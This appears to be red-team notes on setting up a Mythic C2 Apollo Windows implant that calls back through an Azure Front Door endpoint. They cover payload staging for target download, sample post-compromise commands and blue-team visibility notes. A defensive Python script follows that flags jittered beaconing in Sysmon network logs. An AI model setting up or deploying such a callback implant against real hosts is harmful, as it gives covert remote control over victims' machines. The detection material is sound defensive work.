AZURE FRONT DOOR IMPLEMENTATION

root@oco:~$ BROWSER > MythicC2 > Navigation Pane > Create > Create Payload
 Target OS: Windows
 Payload Type: Apollo
 Build Parameters: WinExe
 Build Cmds into Agent: include all
 C2 Profiles:
  Method: http
  Callback Host: {the CDN distribution domain name, i.e. the exposed endpoint}
   - {https://{cdnService}.azurefd.net}
  Callback Interval in seconds: 10
  Callback Jitter in percent: 23
  Callback Port: 443
   - everything else is default!
  HTTP Headers
   - use cases: {can be modified so the profile accepts only specific HTTP headers, e.g. cookies, from a target}
   User-Agent: 
    - use cases: {can be modified in case the attacker-specified user-agent has become a known IOC for the blue team}
 Payload Review: 
  Payload Name: {arbitraryName}.exe
  Description: N/A
  Create Payload!
  
 * this payload can be downloaded from the payload section via the download URL
    - once downloaded by the red team operator, it MUST be transferred to the Payload/Malware Server
       - the target(s) download these payloads from the payload server
#example trigger
PS C:\target> {payload}.exe

MythicC2 > Active Callbacks
 Interaction: whoami
 Interaction: ps
 
 * since everything happens over a TLS/SSL connection, the blue team won't be able
   to see/decrypt the cmds that were executed
    - blue teams should be able to see an outbound ssl/tls connection to the IP of the
      exposed redirector (aws cloudfront)
    - blue teams should also be able to see running processes w/ pids
    - some indicators should also be visible via Windows Event Logs
       - for thorough analysis, implement sysmon on the hosts and send the
         logs to SIEM
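The C2 profile above calls back every 10 seconds with 23% jitter over port 443, and the notes say the blue team sees only the outbound TLS connection metadata, not the commands. That metadata is enough to spot the beacon: with a 10 s interval and 23% jitter every gap between connections falls in [7.7 s, 12.3 s], which is far more regular than a browser or sync client. The script below is an added example, not part of the original notes or of Mythic; it parses Sysmon Event ID 3 (NetworkConnect) records exported from a SIEM as JSON lines, groups connections per (process, destination), and flags flows whose inter-arrival gaps have a low coefficient of variation. The sample log lines, hostnames, paths and IPs are constructed for the example; the field names follow the Sysmon event schema.

```python
"""Beacon-pattern detection over Sysmon Event ID 3 records (added example)."""
import json
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed Sysmon NetworkConnect records, one JSON object per line, the way a
# SIEM export might look. payload.exe beacons every ~10 s with jitter; OneDrive.exe
# and msedge.exe are benign noise. All values are made up for this example.
SAMPLE_LOG = r"""
{"EventID": 3, "UtcTime": "2025-01-15 12:00:00.000", "Image": "C:\\Users\\victim\\Downloads\\payload.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443, "DestinationHostname": "example-cdn.azurefd.net"}
{"EventID": 3, "UtcTime": "2025-01-15 12:00:01.000", "Image": "C:\\Program Files\\OneDrive\\OneDrive.exe", "DestinationIp": "198.51.100.20", "DestinationPort": 443, "DestinationHostname": "sync.example"}
{"EventID": 3, "UtcTime": "2025-01-15 12:00:02.000", "Image": "C:\\Program Files\\OneDrive\\OneDrive.exe", "DestinationIp": "198.51.100.20", "DestinationPort": 443, "DestinationHostname": "sync.example"}
{"EventID": 3, "UtcTime": "2025-01-15 12:00:02.500", "Image": "C:\\Program Files\\OneDrive\\OneDrive.exe", "DestinationIp": "198.51.100.20", "DestinationPort": 443, "DestinationHostname": "sync.example"}
{"EventID": 3, "UtcTime": "2025-01-15 12:00:05.000", "Image": "C:\\Program Files\\Microsoft\\Edge\\msedge.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443, "DestinationHostname": "example-cdn.azurefd.net"}
{"EventID": 3, "UtcTime": "2025-01-15 12:00:09.200", "Image": "C:\\Users\\victim\\Downloads\\payload.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443, "DestinationHostname": "example-cdn.azurefd.net"}
{"EventID": 3, "UtcTime": "2025-01-15 12:00:20.100", "Image": "C:\\Users\\victim\\Downloads\\payload.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443, "DestinationHostname": "example-cdn.azurefd.net"}
{"EventID": 3, "UtcTime": "2025-01-15 12:00:28.500", "Image": "C:\\Users\\victim\\Downloads\\payload.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443, "DestinationHostname": "example-cdn.azurefd.net"}
{"EventID": 3, "UtcTime": "2025-01-15 12:00:40.000", "Image": "C:\\Users\\victim\\Downloads\\payload.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443, "DestinationHostname": "example-cdn.azurefd.net"}
{"EventID": 3, "UtcTime": "2025-01-15 12:00:49.700", "Image": "C:\\Users\\victim\\Downloads\\payload.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443, "DestinationHostname": "example-cdn.azurefd.net"}
{"EventID": 3, "UtcTime": "2025-01-15 12:01:01.800", "Image": "C:\\Users\\victim\\Downloads\\payload.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443, "DestinationHostname": "example-cdn.azurefd.net"}
{"EventID": 3, "UtcTime": "2025-01-15 12:03:00.000", "Image": "C:\\Program Files\\OneDrive\\OneDrive.exe", "DestinationIp": "198.51.100.20", "DestinationPort": 443, "DestinationHostname": "sync.example"}
{"EventID": 3, "UtcTime": "2025-01-15 12:03:01.000", "Image": "C:\\Program Files\\OneDrive\\OneDrive.exe", "DestinationIp": "198.51.100.20", "DestinationPort": 443, "DestinationHostname": "sync.example"}
"""


def parse_events(log_text):
    """Parse newline-delimited JSON, keep Event ID 3 records, attach a datetime."""
    events = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if rec.get("EventID") != 3:
            continue
        rec["_ts"] = datetime.strptime(rec["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        events.append(rec)
    return events


def intervals_by_flow(events, port=443):
    """Group connections by (process image, destination) and return the
    inter-arrival gaps in seconds for each flow, in time order."""
    times = defaultdict(list)
    for e in events:
        if e.get("DestinationPort") != port:
            continue
        # Sysmon fills DestinationHostname via reverse DNS; fall back to the IP.
        dest = e.get("DestinationHostname") or e["DestinationIp"]
        times[(e["Image"], dest)].append(e["_ts"])
    flows = {}
    for key, ts in times.items():
        ts.sort()
        flows[key] = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    return flows


def within_profile(gaps, interval, jitter_pct):
    """True if every gap lies in [interval*(1-j), interval*(1+j)], j = jitter_pct/100.
    For interval=10 and jitter_pct=23 that window is [7.7, 12.3] seconds."""
    j = jitter_pct / 100.0
    lo, hi = interval * (1 - j), interval * (1 + j)
    return bool(gaps) and all(lo <= g <= hi for g in gaps)


def beacon_candidates(events, min_connections=5, max_cv=0.3, port=443):
    """Flag flows whose inter-arrival gaps are too regular for interactive traffic.
    cv = population stdev / mean of the gaps; jittered beacons still score low."""
    findings = []
    for (image, dest), gaps in intervals_by_flow(events, port).items():
        if len(gaps) + 1 < min_connections:
            continue
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            findings.append({"image": image, "dest": dest,
                             "connections": len(gaps) + 1,
                             "mean_interval_s": round(mean, 2),
                             "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for f in beacon_candidates(parse_events(SAMPLE_LOG)):
        print(f)
```

Two caveats when running this against real Sysmon data: DestinationHostname comes from a reverse lookup of the edge IP, which for a CDN front end often does not return the azurefd.net name, so correlate with Sysmon Event ID 22 (DNS query) or the TLS SNI seen by a network sensor rather than relying on the hostname field; and, as the notes say, the TLS payload itself stays opaque, so the detection rests entirely on timing and destination metadata.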
